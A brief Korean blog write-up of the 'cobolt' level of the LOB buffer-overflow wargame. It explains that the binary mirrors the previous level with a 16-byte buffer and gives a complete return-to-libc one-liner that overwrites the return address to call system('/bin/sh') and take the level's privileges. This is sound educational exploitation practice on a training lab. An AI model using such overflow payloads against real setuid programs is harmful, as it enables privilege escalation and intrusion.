-
[LOB] gremlinhacking 2021. 8. 19. 23:24
show chown cobolt를 통하여 쉘을 따면 cobolt 권한을 얻을 수 있다
cobolt.c gremlin과 달라진 점은 buffer의 크기가 256에서 16으로 줄었다는 점 뿐이다
고로 gremlin 공격 계획과 다르지 않다
마찬가지로 RTL 기법을 이용하여 system("/bin/sh")를 실행시키면 된다
./cobolt `python -c 'print "A" * (16+4) + "\xe0\x8a\x05\x40" + "A" * 4 + "\xf9\xbf\x0f\x40"'`
success RTL 기법을 100프로 알고 쓴다는 느낌이 안 들어서 (개념 자체는 쉽지만..)
관련해서 정리하는 글도 적어볼 예정
'hacking' 카테고리의 다른 글
[sstf2021] sqli102 (0) 2021.08.23 [sstf2021] sqli101 (0) 2021.08.22 [sstf2021] bof102 (0) 2021.08.21 [sstf2021] bof101 (0) 2021.08.20 [LOB] gate (0) 2021.08.18